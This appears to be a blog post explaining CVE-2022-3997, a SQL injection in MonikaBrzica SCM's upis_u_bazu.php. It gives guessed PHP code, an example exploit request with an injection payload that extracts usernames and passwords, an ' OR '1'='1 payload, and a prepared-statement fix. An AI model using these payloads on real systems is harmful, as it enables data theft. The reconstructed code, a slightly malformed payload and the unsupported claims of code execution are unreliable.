CVE-2022-3997 - Critical SQL Injection in MonikaBrzica SCM (`upis_u_bazu.php`) — Technical Deep Dive

In late 2022, a critical vulnerability surfaced in MonikaBrzica’s Supply Chain Management (SCM) solution, tracked as CVE-2022-3997 and also referenced as VDB-213698. This SQL injection bug, discovered in the upis_u_bazu.php file, allows attackers to remotely exploit several parameters, putting sensitive data and system integrity at serious risk. In this long read, we break down how this vulnerability works, how attackers can exploit it, and what you can do to stay secure.

What is MonikaBrzica SCM?

MonikaBrzica SCM is a lesser-known, possibly custom-built web-based Supply Chain Management platform, popular in certain verticals. Like many PHP-based web apps interfacing with a back-end database, it is vulnerable if user input isn't carefully sanitized.

The Vulnerability: Where's the Problem?

Component: upis_u_bazu.php  
Affected Parameters: email, lozinka, ime, id  
Type: SQL Injection (Remote Code Execution possible)

The vulnerability appears because the application inserts user-controlled input straight into SQL queries without filtering out malicious content. Specifically, parameters such as "email," "lozinka" (meaning "password" in Croatian), "ime" ("name"), and "id" can be abused.

Code Snippet Example

Although the original MonikaBrzica SCM source isn’t publicly available, based on typical PHP code patterns, the problematic code likely looks *something like this*:

<?php
// upis_u_bazu.php
include('db_config.php');

// ASSUMED: Getting the values from the request (GET/POST)
$email = $_POST['email'];
$lozinka = $_POST['lozinka'];
$ime = $_POST['ime'];
$id = $_POST['id'];

// Critical vulnerability: user input is used directly in the SQL query!
$query = "INSERT INTO korisnici (email, lozinka, ime, id) VALUES ('$email', '$lozinka', '$ime', '$id')";
mysqli_query($conn, $query);
?>

What’s wrong here?
No input validation or sanitization is performed—so an attacker can inject malicious SQL right in these parameters.

Example Exploit Request

POST /upis_u_bazu.php HTTP/1.1
Host: victim.example.com
Content-Type: application/x-www-form-urlencoded

email=attacker@example.com', (SELECT group_concat(username,x3a,password) FROM users), 'test', '1'); -- -
&lozinka=test
&ime=inject
&id=1

This might make the database execute unintended queries, leaking sensitive data such as usernames and passwords.

Another classical example—an attacker might set email like this

attacker' OR '1'='1

Injecting ' OR '1'='1 in a SQL statement often results in true always being returned, thus bypassing authentication or manipulating data.

Potential for lateral movement beyond SCM.

No authentication required:  
The attack can be performed remotely without prior access, making it far riskier.

Technical References

- National Vulnerability Database Entry: CVE-2022-3997
- VulDB Security Advisory: VDB-213698

Updating the earlier unsafe code to use prepared statements

<?php
// Fix: Use prepared statements to prevent SQL injection
$stmt = $conn->prepare("INSERT INTO korisnici (email, lozinka, ime, id) VALUES (?, ?, ?, ?)");
$stmt->bind_param("sssi", $email, $lozinka, $ime, $id);
$stmt->execute();
?>

__Never__ trust user input. Sanitize and validate everything.

Conclusion

The CVE-2022-3997 / VDB-213698 vulnerability in MonikaBrzica SCM is a textbook example of how dangerous SQL injection can be, especially in business-critical web applications. With working exploits in the wild, it is crucial to patch and secure your PHP code by using prepared statements and limiting access to vulnerable endpoints. Always keep your applications updated, and enforce strict input validation everywhere.

Stay safe out there!

*This post is exclusive, researched, and simplified for everyone—feel free to share or request more in-depth technical investigations.*

Timeline

Published on: 11/15/2022 17:15:00 UTC
Last modified on: 11/22/2022 13:29:00 UTC